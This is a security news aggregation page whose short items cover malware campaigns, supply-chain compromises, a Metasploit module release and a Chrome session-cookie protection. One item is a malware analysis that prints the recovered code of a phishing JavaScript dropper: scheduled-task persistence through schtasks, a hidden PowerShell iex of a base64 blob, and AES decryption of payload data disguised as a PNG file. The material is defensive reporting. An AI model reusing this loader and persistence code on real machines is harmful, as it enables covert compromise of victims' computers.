Security & IT News

Android banking trojan linked to Cambodia scam compounds uses forced labour to target users in 21 countries, bypassing security to steal funds.

Speedup Improvements of MSFVenom & New Modules This week, we have added new modules to Metasploit Framework targeting Cisco Catalyst SD-WAN controllers and osTicket as well as updates and improvements to Windows service-for-user persistence, and LDAP/ADCS-related modules to automatically report related services resulting in an improved data stream, which can be queried by using the services command. We also landed an improvement to msfvenom’s bootup time, thanks to bcoles , resulting in an approximate two-times speedup. New module content (4) AD/CS Authenticated Web Enrollment Services Module Authors: Spencer McIntyre, bwatters-r7, and jhicks-r7 Type: Auxiliary Pull request: #20752 contributed by bwatters-r7 Path: admin/http/web_enrollment_cert Description: This adds a new auxiliary/admin/http/web_enrollment_cert modules that allows certificates to be issued from an Active Directory Certificate Services Web Enrollment portal. Its usage is the same as the auxiliary/admin/http/icpr_cert module but enables operators to issue certificates when the web enrollment portal is accessible but the MS-ICPR service is not. Cisco Catalyst SD-WAN Controller Authentication Bypass Author: sfewer-r7 Type: Auxiliary Pull request: #21158 contributed by sfewer-r7 Path: admin/networking/cisco_sdwan_auth_bypass AttackerKB reference: CVE-2026-20127 Description: This adds an auxiliary module to exploit an authentication bypass vulnerability, CVE-2026-20127, affecting Cisco Catalyst SD-WAN Controller. Recently exploited in the wild as a zero-day. osTicket Arbitrary File Read via PHP Filter Chains in mPDF Authors: Arkaprabha Chakraborty @t1nt1nsn0wy and HORIZON3.ai Team Type: Auxiliary Pull request: #20948 contributed by ArkaprabhaChakraborty Path: gather/osticket_arbitrary_file_read AttackerKB reference: CVE-2026-22200 Description: This adds an auxiliary module to exploit, CVE-2026-22200, an authenticated file read vulnerability in osTicket. Windows Service for User (S4U) Scheduled Task Persistence - Event Trigger Authors: Brandon McCann "zeknox" [email protected] , Thomas McCarthy "smilingraccoon" [email protected] , and h00die Type: Exploit Pull request: #20814 contributed by h00die Path: windows/persistence/service_for_user/event Description: Updates the Windows service-for-user persistence technique. Enhancements and features (5) #20973 from bitstr3m-48 - This release enables command execution for non-interactive HWBridge sessions via the sessions -c flag. Additionally, the hwbridge/connect module now preserves parsed JSON error bodies from failed HTTP responses, which improves error messaging. #20977 from g0tmi1k - This updates the exploit/unix/webapp/php_eval module to have a FORMDATA datastore option, which adds HTTP POST-request support and makes the HEADERS datastore option consistent with other modules. #20979 from g0tmi1k - This updates the exploit/unix/webapp/php_include module with additional datastore options and make its usage more consistent with

ReversingLabs has discovered a fresh wave of the graphalgo campaign in which North Korean Lazarus hackers are using fake Florida LLCs, mimicking SWFT Blockchain, and using GitHub typo-squatting to target developers with malware.

The attack surface targeted by Iranian-linked hackers in cyberattacks against U.S. critical infrastructure networks includes thousands of Internet-exposed programmable logic controllers (PLCs) manufactured by Rockwell Automation. [...]

France's move to ditch Windows for Linux is its latest effort to reduce its reliance on American tech giants.

Analysis of 1 billion CISA KEV remediation records reveal a breaking point for human-scale security. Qualys shows most critical flaws are exploited before defenders can patch them. [...]

Cybersecurity researchers have flagged yet another evolution of the ongoing GlassWorm campaign, which employs a new Zig dropper that's designed to stealthily infect all integrated development environments (IDEs) on a developer's machine. The technique has been discovered in an Open VSX extension named "specstudio.code-wakatime-activity-tracker," which masquerades as WakaTime, a

Hackers gained access to an API for the CPUID project and changed the download links on the official website to serve malicious executables for the popular CPU-Z and HWMonitor tools. [...]

UNC6783 hackers and extortionists impersonate support staff, using fake Okta login pages and social engineering to access corporate systems and steal sensitive data.

Qilin, Akira and Dragonforce were responsible for 40% of 672 ransomware incidents reported in March, says Check Point

A financially motivated threat actor tracked as Storm-2755 is stealing Canadian employees' salary payments after hijacking their accounts in payroll pirate attacks. [...]

Chrome’s Device Bound Session Credentials is designed to block infostealers from harvesting session cookie

While much of the discussion on AI security centers around protecting ‘shadow’ AI and GenAI consumption, there's a wide-open window nobody's guarding: AI browser extensions. A new report from LayerX exposes just how deep this blind spot goes, and why AI extensions may be the most dangerous AI threat surface in your network that isn't on anyone's

Google says Gmail end-to-end encryption (E2EE) is now available on all Android and iOS devices, allowing enterprise users to read and compose emails without additional tools. [...]

Claude is actually pretty good on the issues.

Google has made Device Bound Session Credentials (DBSC) generally available to all Windows users of its Chrome web browser, months after it began testing the security feature in open beta. The public availability is currently limited to Windows users on Chrome 146, with macOS expansion planned in an upcoming Chrome release. "This project represents a significant

A critical security vulnerability in Marimo, an open-source Python notebook for data science and analysis, has been exploited within 10 hours of public disclosure, according to findings from Sysdig. The vulnerability in question is CVE-2026-39987 (CVSS score: 9.3), a pre-authenticated remote code execution vulnerability impacting all versions of Marimo prior to and including

I spotted an interesting piece of JavaScript code that was delivered via a phishing email in a RAR archive. The file was called cbmjlzan.JS (SHA256:a8ba9ba93b4509a86e3d7dd40fd0652c2743e32277760c5f7942b788b74c5285) and is only identified as malicious by 15 AV s on VirusTotal[ 1 ]. The file is pretty big (10MB) and contains a copy of the AsmDB project lib[ 2 ]. The purpose is unknown. As usual with JavaScript, the file is pretty well obfuscated and contains UTF characters (supported on Windows) but, when you scrool a bit, some code is disclosed: The script is a Windows-flavor JavaScript and uses ActiveXObject, Microsoft.XMLDOM, ADODB.Stream. It copies itself and implements persistence (through a scheduled task): function FDAWE(x) { return x.split('').reverse().join(''); } var scriptName = WScript['ScriptName']; var urlName = ThreeChars(scriptName) + '.url'; var publicUrl = 'C:\\Users\\Public\\' + urlName; var copiedScript = 'C:\\Users\\Public\\Libraries\\' + scriptName; var fso = new ActiveXObject('Scripting.FileSystemObject'); if (!fso.FileExists(copiedScript)) { if (LOUU...ONIA.split('').join('') === 'YESSSSSSSS') { fso.CopyFile(scriptName, copiedScript); var shell = new ActiveXObject('WScript.Shell'); var cmd = 'cmd /c schtasks /create /sc minute /mo 15 /tn ' + scriptName + ' /tr ' + copiedScript; shell.Run(cmd); } } Three files are dropped in C:\Users\Public: Brio.png Orio.png Xrio.png These aren t pictures, they are used by the PowerShell script executed after implementing persistence: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Noexit -nop -c iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(( __REMOVED__ '.Replace('VFHDVXDJCF',''))))) The PowerShell is even documented and has multiple purposes. First, the file Xrio.png is processed. It contains AES encrypted data: $inputBase64FilePath = C:\Users\PUBLIC\Xrio.png $aes_var = [System.Security.Cryptography.Aes]::Create() $aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC $aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $aes_var.Key = [System.Convert]::FromBase64String('XctflJI8B7Qo2dA6FbwuHYAjjzjViSx3hThThXX1QUY=') $aes_var.IV = [System.Convert]::FromBase64String('eb8a/RvZf2ltVDo2satMKg==') $base64String = [System.IO.File]::ReadAllText($inputBase64FilePath) $encryptedBytes = [System.Convert]::FromBase64String($base64String) $memoryStream = [System.IO.MemoryStream]::new() $memoryStream.Write($encryptedBytes, 0, $encryptedBytes.Length) $memoryStream.Position = 0 # Reset the position for reading $decryptor = $aes_var.CreateDecryptor() $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read) $streamReader = New-Object System.IO.StreamReader($cryptoStream) $decryptedString = $streamReader.ReadToEnd() $cryptoS

Unknown threat actors have hijacked the update system for the Smart Slider 3 Pro plugin for WordPress and Joomla to push a poisoned version containing a backdoor. The incident impacts Smart Slider 3 Pro version 3.5.1.35 for WordPress, per WordPress security company Patchstack. Smart Slider 3 is a popular WordPress slider plugin with more than 800,000 active installations across its free and Pro

A new Lua-based malware, called LucidRook, is being used in spear-phishing campaigns targeting non-governmental organizations and universities in Taiwan. [...]